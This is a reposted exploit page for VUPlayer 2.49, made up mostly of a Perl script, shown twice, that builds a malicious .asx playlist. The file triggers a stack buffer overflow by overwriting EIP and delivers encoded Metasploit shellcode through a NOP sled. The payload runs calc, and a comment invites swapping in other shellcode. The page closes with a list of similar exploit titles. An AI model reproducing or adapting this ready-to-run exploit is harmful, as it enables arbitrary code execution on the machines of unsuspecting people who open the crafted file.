VUPlayer 2.49 .ASX File (HREF) Local Buffer Overflow Exploit
2009-01-12 14:02
369 查看
来源:www.vfcocus.net
#!/usr/bin/perl -w
# author : Houssamix
# VUPlayer 2.49 (.asx File) local Stack Overflow Exploit
print "
########################################################################
#~ Author : HouSSamix #
#~ Program : VUPlayer #
#~ Version : 2.49 #
#~ website : http://www.vuplayer.com/ #
#~ Download : http://vuplayer.com/files/vuplayersetup.exe #
#~ Type : (.asx File) local Stack Overflow Exploit #
########################################################################/n";
###################################################################
$BOF =
"/x3C/x41/x53/x58/x20/x56/x45/x52/x53/x49/x4F/x4E/x3D/x22/x33/x2E".
"/x30/x22/x3E/x0A/x0D/x0A/x3C/x45/x4E/x54/x52/x59/x3E/x0A/x3C/x54".
"/x49/x54/x4C/x45/x3E/x50/x72/x4F/x20/x53/x70/x59/x3C/x2F/x54/x49".
"/x54/x4C/x45/x3E/x0A/x0D/x0A/x3C/x52/x45/x46/x20/x48/x52/x45/x46".
"/x3D/x22/x6D/x51/x47/x69/x42/x45/x67/x30/x33/x70/x55/x52/x42/x41".
"/x44/x55/x56/x77/x4A/x75/x4B/x53/x51/x2B/x73/x4D/x45/x6C/x34/x78".
"/x43/x5A/x75/x77/x42/x75/x6A/x53/x53/x58/x4A/x69/x30/x62/x46/x6B".
"/x32/x31/x49/x34/x66/x75/x30/x69/x70/x64/x56/x34/x68/x41/x31/x32".
"/x45/x49/x4F/x6D/x34/x69/x41/x34/x30/x70/x48/x39/x72/x50/x69/x43".
"/x48/x6B/x65/x41/x52/x71/x50/x75/x6A/x4F/x71/x6C/x78/x63/x4D/x6E".
"/x52/x51/x68/x39/x62/x43/x32/x2B/x75/x53/x34/x4D/x54/x67/x63/x2B".
"/x46/x38/x52/x33/x62/x62/x51/x56/x65/x61/x57/x36/x6E/x38/x6C/x5A".
"/x2B/x48/x51/x59/x57/x5A/x4D/x77/x57/x41/x72/x30/x31/x4C/x61/x5A".
"/x38/x64/x64/x57/x37/x38/x59/x69/x58/x45/x49/x75/x5A/x47/x71/x72".
"/x62/x37/x69/x6D/x62/x57/x79/x6B/x4B/x70/x45/x68/x52/x34/x41/x71".
"/x73/x78/x6C/x6F/x6D/x73/x5A/x74/x37/x73/x33/x77/x43/x67/x6A/x72".
"/x69/x47/x75/x62/x48/x78/x5A/x79/x37/x70/x75/x63/x6A/x63/x36/x37".
"/x77/x52/x43/x79/x5A/x31/x4A/x66/x6B/x44/x2F/x33/x55/x4D/x53/x48".
"/x2F/x53/x32/x4B/x35/x68/x79/x62/x34/x33/x38/x4E/x32/x4E/x43/x4B".
"/x7A/x79/x74/x61/x79/x4E/x69/x52/x50/x63/x65/x57/x4B/x50/x6D/x4F".
"/x73/x2F/x4D/x51/x6F/x38/x75/x55/x5A/x35/x43/x52/x2B/x35/x54/x34".
"/x55/x51/x59/x75/x2B/x53/x4D/x62/x75/x69/x75/x6D/x31/x78/x78/x48".
"/x64/x47/x62/x54/x33/x5A/x6F/x63/x63/x6E/x61/x4C/x65/x72/x77/x41".
"/x36/x38/x56/x52/x30/x55/x50/x4E/x76/x62/x66/x64/x45/x64/x74/x44".
"/x43/x4F/x4A/x49/x51/x44/x4A/x66/x72/x34/x45/x6F/x56/x77/x6E/x6F".
"/x49/x45/x43/x57/x73/x57/x38/x37/x6F/x59/x41/x61/x36/x72/x4D/x38".
"/x65/x46/x53/x70/x6C/x42/x63/x6F/x4E/x68/x74/x34/x6D/x4E/x74/x54".
"/x35/x74/x6B/x66/x41/x64/x47/x6D/x66/x66/x54/x4F/x52/x73/x4B/x54".
"/x65/x54/x71/x68/x79/x71/x41/x2F/x30/x57/x39/x49/x79/x41/x70/x4A".
"/x34/x6B/x6A/x4C/x53/x4C/x32/x7A/x31/x4B/x4B/x67/x33/x67/x31/x6C".
"/x65/x63/x58/x66/x7A/x6F/x55/x32/x43/x68/x34/x66/x76/x68/x31/x54".
"/x44/x6D/x68/x34/x57/x39/x69/x37/x42/x72/x6B/x38/x70/x61/x2B/x38".
"/x32/x79/x49/x57/x38/x79/x44/x34/x56/x78/x30/x37/x4C/x57/x49/x39".
"/x4D/x32/x5A/x59/x56/x2F/x63/x68/x72/x48/x35/x4D/x66/x56/x4D/x47".
"/x62/x6C/x56/x4D/x73/x32/x53/x61/x51/x63/x47/x41/x6E/x67/x51/x72".
"/x71/x35/x43/x38/x5A/x6B/x31/x68/x79/x65/x44/x70/x36/x54/x75/x46".
"/x56/x39/x55/x47/x4B/x59/x73/x6F/x65/x4C/x6B/x38/x53/x71/x39/x6F".
"/x58/x63/x5A/x4F/x4C/x42/x50/x70/x67/x4B/x31/x6F/x4E/x35/x63/x65".
"/x47/x77/x38/x30/x70/x31/x4B/x4C/x4C/x4D/x33/x57/x47/x73/x55/x6E".
"/x36/x64/x6E/x62/x51/x63/x62/x57/x6C/x73/x64/x7A/x42/x79/x62/x53".
"/x41/x38/x63/x33/x56/x69/x62/x57/x6C/x30/x51/x47/x31/x70/x62/x48".
"/x63/x77/x63/x6D/x30/x75/x59/x32/x39/x74/x50/x6F/x68/x67/x42/x42".
"/x4D/x52/x41/x67/x41/x67/x42/x51/x4A/x49/x4E/x4E/x36/x56/x41/x68".
"/x73/x44/x42/x67/x73/x4A/x43/x41/x63/x44/x41/x67/x51/x56/x41/x67".
"/x67/x44/x42/x42/x59/x43/x41/x77/x45/x43/x48/x67/x45/x43/x46/x34".
"/x41/x41/x43/x67/x6B/x51/x6E/x55/x35/x2B/x76/x33/x57/x47/x38/x6F".
"/x59/x79/x7A/x67/x43/x5A/x41/x57/x74/x55/x68/x4D/x6C/x76/x7A/x78".
"/x35/x43/x6A/x74/x55/x79/x41/x42/x2F/x72/x6D/x69/x4B/x63/x6F/x2F".
"/x41/x41/x6E/x41/x39/x48/x63/x46/x6D/x6C/x39/x37/x36/x65/x5A/x64".
"/x56/x64/x62/x5A/x6F/x75/x35/x44/x6E/x58/x6D/x79/x2F/x47/x75/x51".
"/x51/x4E/x42/x45/x67/x30/x33/x77/x38/x51/x45/x41/x43/x43/x35/x47".
"/x54/x34/x30/x73/x76/x7A/x5A/x59/x4A/x4B/x59/x6D/x39/x64/x51/x46".
"/x6E/x76/x75/x54/x6B/x56/x68/x52/x72/x79/x50/x73/x65/x4A/x76/x33".
"/x58/x6D/x44/x67/x52/x42/x42/x70/x64/x45/x74/x63/x74/x33/x79/x50".
"/x35/x63/x4F/x61/x47/x31/x41/x6E/x62/x56/x32/x6D/x32/x79/x50/x79".
"/x6C/x6C/x6E/x78/x4A/x41/x61/x74/x7A/x52/x6C/x70/x58/x59/x73/x32".
"/x61/x2B/x6C/x32/x37/x41/x64/x32/x65/x46/x6F/x4C/x6C/x45/x68/x31".
"/x39/x38/x6D/x6A/x56/x50/x75/x66/x59/x4C/x62/x6B/x71/x35/x42/x74".
"/x33/x53/x39/x41/x2B/x46/x36/x69/x58/x68/x51/x72/x2B/x4A/x54/x58".
"/x4D/x41/x54/x50/x44/x48/x67/x34/x43/x2F/x39/x71/x66/x79/x52/x62".
"/x63/x55/x68/x70/x35/x57/x61/x61/x4E/x5A/x42/x6D/x51/x49/x31/x32".
"/x34/x6F/x6D/x4E/x5A/x5A/x54/x4C/x56/x4C/x34/x72/x49/x62/x4C/x73".
"/x56/x49/x77/x33/x77/x79/x4C/x31/x5A/x44/x71/x4D/x38/x72/x72/x73".
"/x54/x51/x41/x57/x72/x61/x47/x35/x6A/x79/x73/x37/x5A/x37/x65/x69".
"/x78/x49/x6B/x64/x64/x58/x37/x36/x73/x6D/x6E/x4D/x78/x53/x56/x67".
"/x50/x6A/x63/x77/x5A/x6B/x49/x43/x37/x49/x2F/x2B/x2F/x41/x4C/x61".
"/x4C/x69/x4F/x41/x74/x31";
$ECX = "/x43/x43/x43/x43";
$nops = "/x33/x33/x33/x37/x34/x6D/x49/x4D/x4F/x70/x4E/x42";
$EIP = "/x5D/x38/x82/x7C" ; # EIP
$c = "/x90" x 36 ;
# u can change this shellcode but dont forget to use Encoder=PexAlphaNum
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode =
"/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x4f/x49/x49/x49/x49/x49".
"/x49/x51/x5a/x56/x54/x58/x36/x33/x30/x56/x58/x34/x41/x30/x42/x36".
"/x48/x48/x30/x42/x33/x30/x42/x43/x56/x58/x32/x42/x44/x42/x48/x34".
"/x41/x32/x41/x44/x30/x41/x44/x54/x42/x44/x51/x42/x30/x41/x44/x41".
"/x56/x58/x34/x5a/x38/x42/x44/x4a/x4f/x4d/x4e/x4f/x4a/x4e/x46/x44".
"/x42/x30/x42/x50/x42/x30/x4b/x58/x45/x34/x4e/x43/x4b/x48/x4e/x37".
"/x45/x30/x4a/x57/x41/x30/x4f/x4e/x4b/x38/x4f/x44/x4a/x41/x4b/x58".
"/x4f/x55/x42/x42/x41/x50/x4b/x4e/x49/x34/x4b/x58/x46/x53/x4b/x38".
"/x41/x30/x50/x4e/x41/x53/x42/x4c/x49/x49/x4e/x4a/x46/x58/x42/x4c".
"/x46/x57/x47/x50/x41/x4c/x4c/x4c/x4d/x30/x41/x50/x44/x4c/x4b/x4e".
"/x46/x4f/x4b/x33/x46/x35/x46/x52/x46/x30/x45/x37/x45/x4e/x4b/x58".
"/x4f/x35/x46/x32/x41/x50/x4b/x4e/x48/x36/x4b/x48/x4e/x50/x4b/x54".
"/x4b/x38/x4f/x45/x4e/x31/x41/x50/x4b/x4e/x4b/x48/x4e/x51/x4b/x38".
"/x41/x50/x4b/x4e/x49/x48/x4e/x55/x46/x32/x46/x50/x43/x4c/x41/x43".
"/x42/x4c/x46/x56/x4b/x48/x42/x34/x42/x53/x45/x58/x42/x4c/x4a/x57".
"/x4e/x30/x4b/x48/x42/x44/x4e/x30/x4b/x58/x42/x57/x4e/x51/x4d/x4a".
"/x4b/x38/x4a/x46/x4a/x50/x4b/x4e/x49/x50/x4b/x58/x42/x58/x42/x4b".
"/x42/x30/x42/x30/x42/x30/x4b/x58/x4a/x46/x4e/x43/x4f/x45/x41/x43".
"/x48/x4f/x42/x46/x48/x35/x49/x58/x4a/x4f/x43/x38/x42/x4c/x4b/x47".
"/x42/x35/x4a/x36/x42/x4f/x4c/x58/x46/x50/x4f/x35/x4a/x36/x4a/x39".
"/x50/x4f/x4c/x38/x50/x50/x47/x35/x4f/x4f/x47/x4e/x43/x36/x41/x36".
"/x4e/x56/x43/x36/x42/x50/x5a";
$cc = "/x90" x 7687 ;
$asx = "/x2E/x61/x73/x66/x22/x2F/x3E/x0A/x3C/x2F/x45/x4E/x54/x52/x59/x3E".
"/x0A/x3C/x2F/x41/x53/x58/x3E/x0A";
$file="houssamix.asx";
open($FILE, ">$file");
$exp = $BOF.$ECX.$nops.$EIP.$c.$shellcode.$cc.$asx;
print $FILE $exp;
close($FILE);
print "
################################
File exploit created open it with vuplayer
################################
Exploit by Houssamix
/n/n";
#!/usr/bin/perl -w
# author : Houssamix
# VUPlayer 2.49 (.asx File) local Stack Overflow Exploit
print "
########################################################################
#~ Author : HouSSamix #
#~ Program : VUPlayer #
#~ Version : 2.49 #
#~ website : http://www.vuplayer.com/ #
#~ Download : http://vuplayer.com/files/vuplayersetup.exe #
#~ Type : (.asx File) local Stack Overflow Exploit #
########################################################################/n";
###################################################################
$BOF =
"/x3C/x41/x53/x58/x20/x56/x45/x52/x53/x49/x4F/x4E/x3D/x22/x33/x2E".
"/x30/x22/x3E/x0A/x0D/x0A/x3C/x45/x4E/x54/x52/x59/x3E/x0A/x3C/x54".
"/x49/x54/x4C/x45/x3E/x50/x72/x4F/x20/x53/x70/x59/x3C/x2F/x54/x49".
"/x54/x4C/x45/x3E/x0A/x0D/x0A/x3C/x52/x45/x46/x20/x48/x52/x45/x46".
"/x3D/x22/x6D/x51/x47/x69/x42/x45/x67/x30/x33/x70/x55/x52/x42/x41".
"/x44/x55/x56/x77/x4A/x75/x4B/x53/x51/x2B/x73/x4D/x45/x6C/x34/x78".
"/x43/x5A/x75/x77/x42/x75/x6A/x53/x53/x58/x4A/x69/x30/x62/x46/x6B".
"/x32/x31/x49/x34/x66/x75/x30/x69/x70/x64/x56/x34/x68/x41/x31/x32".
"/x45/x49/x4F/x6D/x34/x69/x41/x34/x30/x70/x48/x39/x72/x50/x69/x43".
"/x48/x6B/x65/x41/x52/x71/x50/x75/x6A/x4F/x71/x6C/x78/x63/x4D/x6E".
"/x52/x51/x68/x39/x62/x43/x32/x2B/x75/x53/x34/x4D/x54/x67/x63/x2B".
"/x46/x38/x52/x33/x62/x62/x51/x56/x65/x61/x57/x36/x6E/x38/x6C/x5A".
"/x2B/x48/x51/x59/x57/x5A/x4D/x77/x57/x41/x72/x30/x31/x4C/x61/x5A".
"/x38/x64/x64/x57/x37/x38/x59/x69/x58/x45/x49/x75/x5A/x47/x71/x72".
"/x62/x37/x69/x6D/x62/x57/x79/x6B/x4B/x70/x45/x68/x52/x34/x41/x71".
"/x73/x78/x6C/x6F/x6D/x73/x5A/x74/x37/x73/x33/x77/x43/x67/x6A/x72".
"/x69/x47/x75/x62/x48/x78/x5A/x79/x37/x70/x75/x63/x6A/x63/x36/x37".
"/x77/x52/x43/x79/x5A/x31/x4A/x66/x6B/x44/x2F/x33/x55/x4D/x53/x48".
"/x2F/x53/x32/x4B/x35/x68/x79/x62/x34/x33/x38/x4E/x32/x4E/x43/x4B".
"/x7A/x79/x74/x61/x79/x4E/x69/x52/x50/x63/x65/x57/x4B/x50/x6D/x4F".
"/x73/x2F/x4D/x51/x6F/x38/x75/x55/x5A/x35/x43/x52/x2B/x35/x54/x34".
"/x55/x51/x59/x75/x2B/x53/x4D/x62/x75/x69/x75/x6D/x31/x78/x78/x48".
"/x64/x47/x62/x54/x33/x5A/x6F/x63/x63/x6E/x61/x4C/x65/x72/x77/x41".
"/x36/x38/x56/x52/x30/x55/x50/x4E/x76/x62/x66/x64/x45/x64/x74/x44".
"/x43/x4F/x4A/x49/x51/x44/x4A/x66/x72/x34/x45/x6F/x56/x77/x6E/x6F".
"/x49/x45/x43/x57/x73/x57/x38/x37/x6F/x59/x41/x61/x36/x72/x4D/x38".
"/x65/x46/x53/x70/x6C/x42/x63/x6F/x4E/x68/x74/x34/x6D/x4E/x74/x54".
"/x35/x74/x6B/x66/x41/x64/x47/x6D/x66/x66/x54/x4F/x52/x73/x4B/x54".
"/x65/x54/x71/x68/x79/x71/x41/x2F/x30/x57/x39/x49/x79/x41/x70/x4A".
"/x34/x6B/x6A/x4C/x53/x4C/x32/x7A/x31/x4B/x4B/x67/x33/x67/x31/x6C".
"/x65/x63/x58/x66/x7A/x6F/x55/x32/x43/x68/x34/x66/x76/x68/x31/x54".
"/x44/x6D/x68/x34/x57/x39/x69/x37/x42/x72/x6B/x38/x70/x61/x2B/x38".
"/x32/x79/x49/x57/x38/x79/x44/x34/x56/x78/x30/x37/x4C/x57/x49/x39".
"/x4D/x32/x5A/x59/x56/x2F/x63/x68/x72/x48/x35/x4D/x66/x56/x4D/x47".
"/x62/x6C/x56/x4D/x73/x32/x53/x61/x51/x63/x47/x41/x6E/x67/x51/x72".
"/x71/x35/x43/x38/x5A/x6B/x31/x68/x79/x65/x44/x70/x36/x54/x75/x46".
"/x56/x39/x55/x47/x4B/x59/x73/x6F/x65/x4C/x6B/x38/x53/x71/x39/x6F".
"/x58/x63/x5A/x4F/x4C/x42/x50/x70/x67/x4B/x31/x6F/x4E/x35/x63/x65".
"/x47/x77/x38/x30/x70/x31/x4B/x4C/x4C/x4D/x33/x57/x47/x73/x55/x6E".
"/x36/x64/x6E/x62/x51/x63/x62/x57/x6C/x73/x64/x7A/x42/x79/x62/x53".
"/x41/x38/x63/x33/x56/x69/x62/x57/x6C/x30/x51/x47/x31/x70/x62/x48".
"/x63/x77/x63/x6D/x30/x75/x59/x32/x39/x74/x50/x6F/x68/x67/x42/x42".
"/x4D/x52/x41/x67/x41/x67/x42/x51/x4A/x49/x4E/x4E/x36/x56/x41/x68".
"/x73/x44/x42/x67/x73/x4A/x43/x41/x63/x44/x41/x67/x51/x56/x41/x67".
"/x67/x44/x42/x42/x59/x43/x41/x77/x45/x43/x48/x67/x45/x43/x46/x34".
"/x41/x41/x43/x67/x6B/x51/x6E/x55/x35/x2B/x76/x33/x57/x47/x38/x6F".
"/x59/x79/x7A/x67/x43/x5A/x41/x57/x74/x55/x68/x4D/x6C/x76/x7A/x78".
"/x35/x43/x6A/x74/x55/x79/x41/x42/x2F/x72/x6D/x69/x4B/x63/x6F/x2F".
"/x41/x41/x6E/x41/x39/x48/x63/x46/x6D/x6C/x39/x37/x36/x65/x5A/x64".
"/x56/x64/x62/x5A/x6F/x75/x35/x44/x6E/x58/x6D/x79/x2F/x47/x75/x51".
"/x51/x4E/x42/x45/x67/x30/x33/x77/x38/x51/x45/x41/x43/x43/x35/x47".
"/x54/x34/x30/x73/x76/x7A/x5A/x59/x4A/x4B/x59/x6D/x39/x64/x51/x46".
"/x6E/x76/x75/x54/x6B/x56/x68/x52/x72/x79/x50/x73/x65/x4A/x76/x33".
"/x58/x6D/x44/x67/x52/x42/x42/x70/x64/x45/x74/x63/x74/x33/x79/x50".
"/x35/x63/x4F/x61/x47/x31/x41/x6E/x62/x56/x32/x6D/x32/x79/x50/x79".
"/x6C/x6C/x6E/x78/x4A/x41/x61/x74/x7A/x52/x6C/x70/x58/x59/x73/x32".
"/x61/x2B/x6C/x32/x37/x41/x64/x32/x65/x46/x6F/x4C/x6C/x45/x68/x31".
"/x39/x38/x6D/x6A/x56/x50/x75/x66/x59/x4C/x62/x6B/x71/x35/x42/x74".
"/x33/x53/x39/x41/x2B/x46/x36/x69/x58/x68/x51/x72/x2B/x4A/x54/x58".
"/x4D/x41/x54/x50/x44/x48/x67/x34/x43/x2F/x39/x71/x66/x79/x52/x62".
"/x63/x55/x68/x70/x35/x57/x61/x61/x4E/x5A/x42/x6D/x51/x49/x31/x32".
"/x34/x6F/x6D/x4E/x5A/x5A/x54/x4C/x56/x4C/x34/x72/x49/x62/x4C/x73".
"/x56/x49/x77/x33/x77/x79/x4C/x31/x5A/x44/x71/x4D/x38/x72/x72/x73".
"/x54/x51/x41/x57/x72/x61/x47/x35/x6A/x79/x73/x37/x5A/x37/x65/x69".
"/x78/x49/x6B/x64/x64/x58/x37/x36/x73/x6D/x6E/x4D/x78/x53/x56/x67".
"/x50/x6A/x63/x77/x5A/x6B/x49/x43/x37/x49/x2F/x2B/x2F/x41/x4C/x61".
"/x4C/x69/x4F/x41/x74/x31";
$ECX = "/x43/x43/x43/x43";
$nops = "/x33/x33/x33/x37/x34/x6D/x49/x4D/x4F/x70/x4E/x42";
$EIP = "/x5D/x38/x82/x7C" ; # EIP
$c = "/x90" x 36 ;
# u can change this shellcode but dont forget to use Encoder=PexAlphaNum
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode =
"/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x4f/x49/x49/x49/x49/x49".
"/x49/x51/x5a/x56/x54/x58/x36/x33/x30/x56/x58/x34/x41/x30/x42/x36".
"/x48/x48/x30/x42/x33/x30/x42/x43/x56/x58/x32/x42/x44/x42/x48/x34".
"/x41/x32/x41/x44/x30/x41/x44/x54/x42/x44/x51/x42/x30/x41/x44/x41".
"/x56/x58/x34/x5a/x38/x42/x44/x4a/x4f/x4d/x4e/x4f/x4a/x4e/x46/x44".
"/x42/x30/x42/x50/x42/x30/x4b/x58/x45/x34/x4e/x43/x4b/x48/x4e/x37".
"/x45/x30/x4a/x57/x41/x30/x4f/x4e/x4b/x38/x4f/x44/x4a/x41/x4b/x58".
"/x4f/x55/x42/x42/x41/x50/x4b/x4e/x49/x34/x4b/x58/x46/x53/x4b/x38".
"/x41/x30/x50/x4e/x41/x53/x42/x4c/x49/x49/x4e/x4a/x46/x58/x42/x4c".
"/x46/x57/x47/x50/x41/x4c/x4c/x4c/x4d/x30/x41/x50/x44/x4c/x4b/x4e".
"/x46/x4f/x4b/x33/x46/x35/x46/x52/x46/x30/x45/x37/x45/x4e/x4b/x58".
"/x4f/x35/x46/x32/x41/x50/x4b/x4e/x48/x36/x4b/x48/x4e/x50/x4b/x54".
"/x4b/x38/x4f/x45/x4e/x31/x41/x50/x4b/x4e/x4b/x48/x4e/x51/x4b/x38".
"/x41/x50/x4b/x4e/x49/x48/x4e/x55/x46/x32/x46/x50/x43/x4c/x41/x43".
"/x42/x4c/x46/x56/x4b/x48/x42/x34/x42/x53/x45/x58/x42/x4c/x4a/x57".
"/x4e/x30/x4b/x48/x42/x44/x4e/x30/x4b/x58/x42/x57/x4e/x51/x4d/x4a".
"/x4b/x38/x4a/x46/x4a/x50/x4b/x4e/x49/x50/x4b/x58/x42/x58/x42/x4b".
"/x42/x30/x42/x30/x42/x30/x4b/x58/x4a/x46/x4e/x43/x4f/x45/x41/x43".
"/x48/x4f/x42/x46/x48/x35/x49/x58/x4a/x4f/x43/x38/x42/x4c/x4b/x47".
"/x42/x35/x4a/x36/x42/x4f/x4c/x58/x46/x50/x4f/x35/x4a/x36/x4a/x39".
"/x50/x4f/x4c/x38/x50/x50/x47/x35/x4f/x4f/x47/x4e/x43/x36/x41/x36".
"/x4e/x56/x43/x36/x42/x50/x5a";
$cc = "/x90" x 7687 ;
$asx = "/x2E/x61/x73/x66/x22/x2F/x3E/x0A/x3C/x2F/x45/x4E/x54/x52/x59/x3E".
"/x0A/x3C/x2F/x41/x53/x58/x3E/x0A";
$file="houssamix.asx";
open($FILE, ">$file");
$exp = $BOF.$ECX.$nops.$EIP.$c.$shellcode.$cc.$asx;
print $FILE $exp;
close($FILE);
print "
################################
File exploit created open it with vuplayer
################################
Exploit by Houssamix
/n/n";
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- iRehearse (.m3u File) Local Buffer Overflow PoC
- ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit漏洞及攻击代码分析(留个坑,以后自己填)
- Sasser Worm FTPD Remote Buffer Overflow Exploit on Port 5554
- Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit
- MS Windows Animated Cursor (.ANI) Local Overflow Exploit
- Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)
- 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
- Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)
- MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)
- exploit - SLMail 5.5 - POP3 PASS Buffer Overflow Exploit
- Microsoft Word Buffer Overflow (Exploit 2)
- Buffer Overflow Exploit
- CParserError: Error tokenizing data. C error: Buffer overflow caught - possible malformed input file
- PEiD &amp;lt;= 0.92 Buffer Overflow Exploit
- Writing buffer overflow exploits - a tutorial for beginners
- mo_jk2 v2.0.2 for Apache 2.0 Remote Buffer Overflow Exploit (win32)
- Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit
- Freefloat FTP Server (CWD command) Buffer Overflow Exploit
- WinRAR 3.x LHA Buffer Overflow Exploit
- Kingsoft Office Writer 2012 8.1.0.3385 - (.wps) Buffer Overflow Exploit (SEH)